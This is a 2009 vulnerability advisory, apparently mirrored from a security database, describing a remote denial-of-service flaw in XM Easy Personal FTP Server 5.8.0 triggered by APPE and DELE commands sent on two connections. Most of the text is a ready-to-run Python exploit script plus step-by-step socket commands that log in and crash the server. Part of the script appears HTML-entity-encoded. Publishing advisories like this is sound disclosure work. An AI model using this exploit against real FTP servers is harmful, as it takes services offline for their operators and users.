Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22792
HistoryNov 14, 2009 - 12:00 a.m.

XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability

2009-11-1400:00:00
vulners.com
22
JSON

Date of Discovery: 13-Nov-2009

Credits:zhangmc[at]mail.ustc.edu.cn

Vendor: Dxmsoft

Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy use FTP server Application. Denial of service vulnerability exists in XM Personal
FTP Server when "APPE" is used in one socket connection while "DELE" command is used in another.

Details:
If you could log on the server successfully, take the following steps and the ftp server will stop responding:

first socket connection:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.close()

second socket connection:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("DELE "+ test_string +"\r\n")

Severity:
High

Exploit example:

#!/usr/bin/python
import socket
import sys

def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string="a"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r

sock_data.bind&#40;&#40;&#39;127.0.0.1&#39;,31339&#41;&#41;
sock_data.listen&#40;1&#41;

sock.send&#40;&quot;PORT 127,0,0,1,122,107&#92;r&#92;n&quot;&#41;
print &quot;[-] &quot;+ &#40;&quot;PORT 127,0,0,1,122,107&#92;r&#92;n&quot;&#41;
r=sock.recv&#40;1024&#41;
print &quot;[+] &quot;+ r
    
sock.send&#40;&quot;APPE &quot;+ test_string +&quot;&#92;r&#92;n&quot;&#41;
print &quot;[-] &quot;+ &#40;&quot;APPE &quot;+ test_string +&quot;&#92;r&#92;n&quot;&#41;
r=sock.recv&#40;1024&#41;
print &quot;[+] &quot;+ r


 
sock.close&#40;&#41;

sock = socket.socket&#40;socket.AF_INET, socket.SOCK_STREAM&#41;
try:
    sock.connect&#40;&#40;hostname, 21&#41;&#41;
except:
    print &#40;&quot;Connection error!&quot;&#41;
    sys.exit&#40;1&#41;
r=sock.recv&#40;1024&#41;
print &quot;[+] &quot;+ r
sock.send&#40;&quot;user &#37;s&#92;r&#92;n&quot; &#37;username&#41;
print &quot;[-] &quot;+ &#40;&quot;user &#37;s&#92;r&#92;n&quot; &#37;username&#41;
r=sock.recv&#40;1024&#41;
print &quot;[+] &quot;+ r
sock.send&#40;&quot;pass &#37;s&#92;r&#92;n&quot; &#37;passwd&#41;
print &quot;[-] &quot;+ &#40;&quot;pass &#37;s&#92;r&#92;n&quot; &#37;passwd&#41;
r=sock.recv&#40;1024&#41;
print &quot;[+] &quot;+ r

sock.send&#40;&quot;DELE &quot;+ test_string +&quot;&#92;r&#92;n&quot;&#41;
print &quot;[-] &quot;+ &#40;&quot;DELE &quot;+ test_string +&quot;&#92;r&#92;n&quot;&#41;
r=sock.recv&#40;1024&#41;
print &quot;[+] &quot;+ r    

sys.exit&#40;0&#41;;
JSON